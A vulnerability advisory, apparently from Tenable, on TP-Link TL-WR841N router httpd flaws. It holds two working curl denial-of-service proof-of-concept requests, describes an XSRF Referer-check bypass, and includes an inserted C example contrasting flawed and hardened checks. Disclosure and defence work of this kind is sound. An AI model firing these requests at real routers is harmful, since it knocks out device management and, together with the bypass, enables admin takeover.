
[R1] TP-Link TL-WR841N Multiple Vulnerabilities

Critical

Synopsis

Tenable was recently investigating TP-Link's TL-WR841N v13 running firmware 0.9.1 4.16 v0348.0 (listed as TL-WR841N(US)_V13_180119 on the download page) and found multiple vulnerabilities in its httpd web interface.

CVE-2018-15700: httpd Denial of Service via Referer Header

A locally connected user sending an HTTP request whose "Referer" field lacks the protocol string will cause the httpd service to terminate. We believe this is a NULL pointer dereference in the http_parser_main function. The problem starts with a memcmp looking for "http://" in the first seven bytes of the "Referer" field; only if this comparison succeeds is the "Referer" string variable initialized. When the memcmp fails, program flow continues anyway and attempts string operations on the still-NULL string. The resulting crash requires a router reboot to restore the httpd web interface.

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: DOS' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' --compressed

CVE-2018-15701: httpd Denial of Service via Cookie Header

Crafting an HTTP request with an HTTP "Cookie" field of "Authorization;" will result in the httpd service terminating. Again, a router reboot is required to restore the web interface. We believe this is another parsing error in http_parser_main.

curl 'http://tplinkwifi.net/' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://tplinkwifi.net/' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Cookie: Authorization;' --compressed

CVE-2018-15702: XSRF due to Incomplete Referer Check

In the http_parser_main function, referer whitelisting is done with strncmp, using a length taken from the whitelisted string itself ("tplinklogin.net", "tplinkwifi.net", or the router's IP address). Because strncmp bounded by the length of the expected value is a prefix test rather than a full comparison, any Referer whose host merely begins with one of those strings passes the check. An attacker can therefore pass it by controlling a domain or subdomain of the form "tplinklogin.net*", "tplinkwifi.net*", or "<router's IP>*" (for example, a host of the form tplinkwifi.net.<attacker-controlled domain>).

This issue is magnified in severity by a previously disclosed but still unpatched authentication bypass vulnerability (CVE-2018-11714). Together, the two allow a remote attacker to perform XSRF against various sensitive cgi scripts without valid credentials. A remote attacker is able to enable remote management and reset the router admin password.
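The following is an added example, not TP-Link's firmware code, that reconstructs the two Referer-handling flaws described in CVE-2018-15700 and CVE-2018-15702 and puts each beside a hardened version: a parser that only sets its host pointer on the "http://" branch and otherwise hands NULL to later string operations, and an allow-list check whose strncmp length is taken from the expected value and so accepts any host that merely starts with it. All function names, the allow-list contents (including the 192.168.0.1 address) and the Referer values are this example's own assumptions; the flawed scheme check uses strncmp rather than the firmware's memcmp so that the demonstration itself stays well-defined on short input.

```c
/* Added example (not TP-Link's code): flawed Referer parsing and allow-list
 * checks of the kind the advisory describes, each beside a hardened form.
 * Names, hosts and sample Referer values are assumptions for illustration. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Hosts accepted as a same-origin Referer (constructed for this example). */
static const char *const ALLOWED_HOSTS[] = {
    "tplinkwifi.net", "tplinklogin.net", "192.168.0.1"
};
#define N_ALLOWED (sizeof ALLOWED_HOSTS / sizeof ALLOWED_HOSTS[0])

/* Flawed pattern (CVE-2018-15700 style): only the "http://" branch sets the
 * pointer. On any other Referer (e.g. "DOS") it stays NULL, yet the firmware
 * goes on to run string operations on it, which is the crash. This function
 * stops short of that and just returns the pointer it would have used. */
const char *referer_host_flawed(const char *referer)
{
    const char *host = NULL;                 /* never set on the failure path */
    if (referer && strncmp(referer, "http://", 7) == 0)
        host = referer + 7;
    return host;                             /* NULL here means "would crash" */
}

/* Hardened: reject a missing scheme up front instead of continuing with NULL.
 * Copies the bare host (no path, port, query or fragment) into out. */
int referer_host_safe(const char *referer, char *out, size_t outlen)
{
    const char *p;
    size_t n;
    if (referer == NULL) return -1;
    if (strncmp(referer, "http://", 7) == 0)       p = referer + 7;
    else if (strncmp(referer, "https://", 8) == 0) p = referer + 8;
    else return -1;                          /* e.g. "Referer: DOS" */
    n = strcspn(p, "/:?#");                  /* host ends at path, port, query */
    if (n == 0 || n >= outlen) return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* Flawed allow-list (CVE-2018-15702 style): strncmp bounded by the length of
 * the allowed string is a prefix test, so "tplinkwifi.net.attacker.example"
 * is accepted just like "tplinkwifi.net". */
int referer_allowed_flawed(const char *host)
{
    size_t i;
    for (i = 0; i < N_ALLOWED; i++)
        if (strncmp(host, ALLOWED_HOSTS[i], strlen(ALLOWED_HOSTS[i])) == 0)
            return 1;
    return 0;
}

/* Hardened: compare the whole host, so only an exact match passes. */
int referer_allowed_safe(const char *host)
{
    size_t i;
    for (i = 0; i < N_ALLOWED; i++)
        if (strcmp(host, ALLOWED_HOSTS[i]) == 0)
            return 1;
    return 0;
}

/* Origin check as a CGI handler should run it: safe parse, then exact match. */
int request_origin_ok(const char *referer)
{
    char host[256];
    if (referer_host_safe(referer, host, sizeof host) != 0)
        return 0;
    return referer_allowed_safe(host);
}

/* Same flow with the prefix-based allow-list, to show what it lets through. */
int request_origin_flawed(const char *referer)
{
    char host[256];
    if (referer_host_safe(referer, host, sizeof host) != 0)
        return 0;
    return referer_allowed_flawed(host);
}

int main(void)
{
    /* Constructed Referer values: the advisory's PoC value, a legitimate
     * one, and an attacker-controlled look-alike that defeats the prefix test. */
    const char *dos       = "DOS";
    const char *good      = "http://tplinkwifi.net/";
    const char *lookalike = "http://tplinkwifi.net.attacker.example/";

    printf("flawed parse of \"%s\": %s\n", dos,
           referer_host_flawed(dos) ? "host set" : "NULL -> crash in string ops");
    printf("safe origin check, \"%s\": %d\n", dos, request_origin_ok(dos));
    printf("safe origin check, \"%s\": %d\n", good, request_origin_ok(good));
    printf("look-alike \"%s\": flawed=%d safe=%d\n", lookalike,
           request_origin_flawed(lookalike), request_origin_ok(lookalike));
    return 0;
}
```

The hardened check deliberately normalises the host before comparing (stripping port, path and query) and then uses strcmp, so the comparison length can never be shorter than the value under test. A practitioner verifying a vendor fix for CVE-2018-15702 should test exactly the look-alike case above: a Referer whose host starts with the router's name or IP but continues with further labels.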

Solution

Currently no solution exists. At time of publication, the most recent firmware version on TP-Link's website is listed as TL-WR841N(US)_V13_180119 which is the vulnerable firmware version (0.9.1 4.16 v0348.0).

Disclosure Timeline

07-02-2018 - Tenable sends vulnerability write up and proof of concepts to TP-Link.
07-18-2018 - Tenable asks TP-Link for acknowledgement.
07-18-2018 - TP-Link says all the bugs are already fixed. Suggests Tenable verify using the latest firmware.
07-27-2018 - Tenable confirms the vulnerabilities still exist in the latest build (0.9.1 4.16 v0348.0 Build 180119 Rel 66498n). Tenable asks if there is a more recent unpublished build.
07-27-2018 - TP-Link says they will check the firmware and let Tenable know.
08-27-2018 - Tenable asks for an update.
08-27-2018 - TP-Link asks for hardware version and firmware version.
08-27-2018 - Tenable responds TL-WR841N V13 0.9.1 4.16 v0348.0 Build 180119 Rel 66498n
08-27-2018 - TP-Link sends a beta firmware for Tenable to test.
08-27-2018 - TP-Link follows up that they hope for feedback ASAP.
08-27-2018 - Tenable can't download the rar attachment via email.
08-27-2018 - TP-Link suggests using WeTransfer.
08-27-2018 - Tenable agrees.
08-30-2018 - Tenable asks TP-Link for an update.
08-30-2018 - TP-Link says they sent a WeTransfer. They'll try again.
08-30-2018 - Tenable receives the firmware (0.9.1 4.16 v0348.0 Build 180821 Rel.42708n(Beta)) and confirms that two of the vulnerabilities still exist.
08-30-2018 - TP-Link notifies Tenable of another WeTransfer.
08-30-2018 - Tenable informs TP-Link that they sent the exact same firmware as before.
09-20-2018 - Tenable asks TP-Link for an update.
09-20-2018 - TP-Link says they already sent the beta version.
09-20-2018 - Tenable says they haven't received anything new.
09-20-2018 - TP-Link says WeTransfer informed them that Tenable downloaded the firmware. Asks Tenable for an email address that doesn't block rar files.
09-20-2018 - Tenable reiterates that the last downloaded version was vulnerable. Tenable asks for a new version via WeTransfer.
10-01-2018 - Tenable reminds TP-Link that today is the 90 day disclosure day.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2018-27
Credit:
David Wells
CVSSv2 Base / Temporal Score:
9.3/7.5
CVSSv2 Vector:
AV:N/AC:M/Au:N/C:C/I:C/A:C
Nessus Plugin ID: 117861
Affected Products:
TL-WR841N v13 0.9.1 4.16 v0348.0
Risk Factor:
Critical

Advisory Timeline

10-01-2018 - [R1] Initial Release
